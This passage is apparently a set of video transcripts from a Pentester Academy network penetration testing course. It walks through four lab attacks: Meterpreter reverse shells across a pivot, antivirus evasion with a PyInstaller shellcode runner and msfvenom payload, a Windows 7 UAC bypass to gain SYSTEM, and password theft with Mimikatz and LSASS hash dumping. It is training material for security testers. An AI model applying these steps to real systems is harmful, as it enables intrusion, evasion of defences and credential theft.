host in the payload to the Windows 7, in our case, the Windows 7 machine's IP address, which is in the same network as the Metasploitable 2 machine. And Meterpreter will automatically take care of all the forwarding and get the shell back to you, right? So this is great news. You don't have to go and do a ton of stuff you thought you would have to. So let's go back in here. Now, just to save some time, I already have a session to the Windows 7 machine, which I have gotten by exploiting the Bad Blue service as shown in the previous videos. Now, let me jump on this session. And if you remember, the IP address of the Windows 7 machine facing the Ubuntu Metasploitable machine is 112.112.112.10, and the IP address of the Metasploitable 2 machine is 112.112.112.20, right? If you don't recall, please watch previous videos on how we discovered the IP address. So now, here is what we want to do. Let's background this. Let's first check if we have our route still in there. So do a route print, and the route is already there for the 112.112.112.1 network via session 1. So let's go ahead and search for PHP CGI arg, which we had used previously with the bind shell. This should take a minute. Just going to use this exploit now. Now the R host would be the metasploitable 2 machines IP address, which is 112.112.112.20. Let's set the payload to be PHP meterpreter reverse TCP. The L host would be the Windows 7's machine's IP address facing or on the same network as our victim, and we'll set that to 112.112.112.10. Right? Now let's hit exploit. And if you notice, now we have a reverse shell from the metasploitable 2 machine to us. And notice something very interesting. This says started reverse handler on 112.112.112.10, which is really the Windows 7 machine on its port 4444 via the meterpreter session on 1, right? So this is really kind of doing all the hard work for you and ensuring that forwarding is happening back to the attacker machine so that we can once again at the comfort of our home get the meterpreter session. Fantastic, right? So keep this in mind. In order to do reverse TCPs across pivots, you do not need to do any other black magic, right? You can simply use Metasploit, ensure you set L host to the pivot's IP address, which is on the same segment as the victim from whom you desire to get the reverse TCP, and everything else is going to be handled by Metasploit for you. Fantastic. So that's all I had in mind for this video. If you're enjoying your time here at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. All, welcome to the Network Pen Testing course at Pentester Academy. In this video, we will take an example of AV evasion using Python. So it is important to note that in AV evasion, there is no silver bullet, which is it would be rare to find a technique which would work across all AVs all the time. Even if there comes upon such a technique, typically most AV vendors eventually go ahead and patch against it. Now you will always have to keep improvising your techniques, and in my humble opinion, custom techniques and code has always been more difficult to beat by the AVs than just using code off the internet. Now, having said that, I'm going to demo one of the available techniques which has been around for over a year, and still it is possible to bypass some AVs with it. So keep in mind though that by the time you watch the video, the technique might as well already be patched. So to do this, you will install PyInstaller available at the link below on your Windows machine. And we will also be downloading the PyInstaller Win32 shellcode runner script available on Pastebin at the given URL. So let's begin. Now, before we start, let's actually look at what is the problem with payloads as EXEs. So let me go ahead and run our Python server. Let me go to my Windows machine. Navigate to this URL. And let's say, let me download reverse payload.exe as an example. So reverse TCP. Let me go ahead and store this, fair enough, in code samples. So open the folder. And now let me scan this with an antivirus. Now, as you can clearly see, the AV has detected a threat, and this would be some specific virus or some specific malware which it has detected. But truth be told, pretty much payload as EXEs are not useful at all, as you can clearly see, because of the high detection rate. Now, this is where I'll demonstrate one of the techniques which seems to work as of now. So let's go to our backtrack machine. And I'm already on the paste bin URL, which I showed you just a couple of minutes back. Let me go to the raw paste, copy all of this out, go back to my shell, paste this as av bypass.py, paste all of this in. Now this code has been put up by Mihi42, and here is what it does, right? So this part in here is really your shell code, your reverse TCP connection as an example. And after that, what the rest of the code really does is, in very simple terms, allocates a page in memory, goes ahead and copies the shell code there, makes that memory executable, and then passes control to it. You can look through all the Windows APIs and what they mean if you like, but this is a quick summary of what this code does. Now, we need to replace this with our own shell code, which we will generate using MSF Venom. So let me delete this. Let me open a new terminal. Let me use MSF Venom. So you have Windows, Meterpreter, reverse TCP. Lhost is the attacker's IP, which is really our IP. And let's dump this in a C array format. After this, we will copy this shell code into avbypass.py. So let's go ahead, copy this out. Go back in here. Paste it. Close the file. And now let's go ahead and offer this file for download using our simple HTTP server. Now AV bypass needs to be compiled and linked into an exe on a Windows platform. So let's use the victim machine itself to go ahead and do this. So here is AV bypass. Let me copy this out to one of the directories. So let me copy this to code samples. And let me open a command prompt, so that now we can use the installed PyInstaller to go ahead and compile this into an exe. Now you should already have installed PyInstaller on your Windows 7 machine. If not, do it right now. It's a trivial exercise, so I'm pretty much leaving it to you. So let me change to the folder where basically we have our PyInstaller installed. And now let me invoke PyInstaller with the -w-a-f option. Let me go 2 directories down to get my avbypass.py file. In the meantime, let me open this folder as well. So PyInstaller is hard at work. And if you notice in the end, it says appending archive to exe, blah, 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 avbypass.exe, which seems to be inside the dist folder inside PyInstaller. So there is our AV bypass. Let's just check if the AV can detect it right now. And currently it sets no threats found, as you can clearly see. Now let's go back to our Linux machine. Use exploit multi-handler. Set the payload to Windows Meterpreter reverse TCP. Set lhost to 192.168.1.10. Exploit so we can wait for our reverse connection. Go back in here, run this, and receive our MetaPressure session. So sometimes it just takes a bit before MetaPressure really starts working. There you go. Right? You can figure out our UID. You can figure out our PID 2908. If I do a PS, 2908 is really the avbypass.exe, which we just ran. Now please note this technique may bypass some AVs, may not bypass others. At the very same time, this may expire any given day. The whole idea here was to just show you that it is possible to do AV bypass. In later videos, maybe as a separate series, we will discuss about creating custom techniques to do AV bypass for penetration tests. So hopefully you've enjoyed this video, and everything used is out there, so you can go ahead and download it and try it out yourself. And if you're enjoying your time here at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Network Pentesting course at Pentester Academy. Now in this video, we will look at Windows 7 privilege escalation using UAC bypass. So let's jump right in. Now I have my Windows 7 system which is running the vulnerable bad blue server. If you haven't looked at this, then check out older videos in this same series and you will see the link on how to set it up and all of that. So I'm going to go ahead and exploit it. In my case, this is at an IP 1.30, an exploit, and I will get a MetaPressure session. And there we go. Right now we are really a user account and not system, and hence on Windows 7 if you try privileged operations, for example like hash dump and all of that, it would not succeed, right? And even if you try get system, depending on the specific version of Windows 7, the command may hang or nothing may really happen, or you may actually get an error saying insufficient privileges or the equivalent, right? On many systems I've even seen a reboot happen, like on mine, and this command fails as well. So let me wait for my Windows machine to come up and we'll look at the rest in just a bit. Okay, so let's go ahead and exploit the machine again. My Windows 7 machine is back. Now the first thing I'm going to do is migrate to a more stable process. Of course, our favorite always is explorer.exe. Which I'm trying to find here. Here it is. Okay, so I have a PID 2780. 2780. Let's go ahead, migrate in there, just so that the process is more stable. Now, before we run system, we need to bypass UAC on Windows 7. So to do that, let's just background our current Meterpreter session and use exploit Windows local bypass UAC, right? If you look at the options, what you would notice is we need to feed a session, and this session is going to be our Meterpreter session ID, right? Because this is going to be a local privilege escalation which is going to happen, and hence we need to give it the Meterpreter ID, which is 2. So we can go ahead and set session to be 2, and then we can set the payload to be Windows Meterpreter reverse TCP. Set lhost to be 192.168.1.10, which is the attacker's IP address. Now we can hit exploit, and the local UAC bypass, once it successfully works, would go ahead and give us a new Meterpreter session. Does not seem to be happening. Let's try again. There we go. Right on the second attempt, we were able to go ahead and get basically a new Meterpreter session which has already bypassed UAC, right? So this is something which I've seen multiple times with the UAC bypass exploit, is that it might not work immediately, in which case just give it another shot. Now the best part is this session currently, of course, is still running as the user security tube, but this allows us to get system comfortably. And there we go. Do a get UID again, and we get NT authority system. So after this, we can go ahead and easily run our post exploitation scripts as we please, such as the smart hash dump, and we would now get the hashes on the system, which we can use with different cracking tools to break in, right? So this is really how we can go ahead and bypass UAC on a Windows 7 machine and get system. Now this technique is very standard, but keep in mind that I've found a lot of times that it is a bit kind of unstable, which is you need to do a couple of retries. The second thing to really note is that if AVs are present on the system and are enabled, more often than not, they would end up detecting this uploaded file which we are using for bypassing UAC. Now we will look at how to create custom executables and or the existing ones from Metasploit and crypt them and all of that in later series where we look at AV evasion in totality, right? But keep that in mind. And this is a very standard way to bypass UAC using Metasploit. So hopefully this video has been fun. Now, pretty much just running you through the slides. So we've done the exploitation, we couldn't get system, we've bypassed UAC, and now we have system, right? In the next video, we will look at other interesting aspects of what you can do once you have system on a Windows 7 box. So hopefully you enjoyed this video at Pentester Academy, and if you did, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Network Pentesting course at Pentester Academy. Now in this video, we will look at Windows 7 hash dumping and Mimikatz. So the assumption is that you've already done the last video and you have a meterpreter which has been created after the UAC bypass. Now here we are. At this point we are still the user. Let's actually use get system to go ahead and become system. Oops, sorry, I want to do a get UID. There we go. Now one of the things which you can do is really with originally a tool called Mimikatz, which could read the memory dump of lasses and figure out the password hashes and even cached passwords which could be used for HTTP digest authentication. Now in order to use Mimikatz, all we have to do is hit load Mimikatz, and there are a bunch of options you can try. The one we are interested in is wdigest, and as you can clearly see, the password, rather the cached password, is what is now shown in plain text as ABC123 for security tube. As you can imagine, that wasn't the best password you could have chosen. Now apart from this, of course, you could also have dumped the password hashes. So to do that, you can actually do a run post Windows gather, and you can use the smart hash dump script, and this goes ahead and stores the hashes in a format which is recognized and can be used with John the Ripper. So we can cat this file, and then we can pass this to John the Ripper with an appropriate word list, right? Now what you would notice is your regular hash dump utility does not seem to work. Now if you really want this to work, you need to inject yourself into the lasses process. So we can do a PS search for lasses, which is the local system authority process, 732. Let's migrate to 732. And now let's do a hash dump, and there you go, right? Now we have all the hashes. So really I would encourage you to try out other options in Mimikatz and also try out using the password hashes and feeding them to John the Ripper. Now keep in mind, in Windows 7 you need to ensure that you have system privileges before you can run Mimikatz. And at the very same time, if you want to run hash dump, remember to inject into lasses, right? So that's all for this video. Hopefully you've enjoyed this, and if you like what you see here at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you.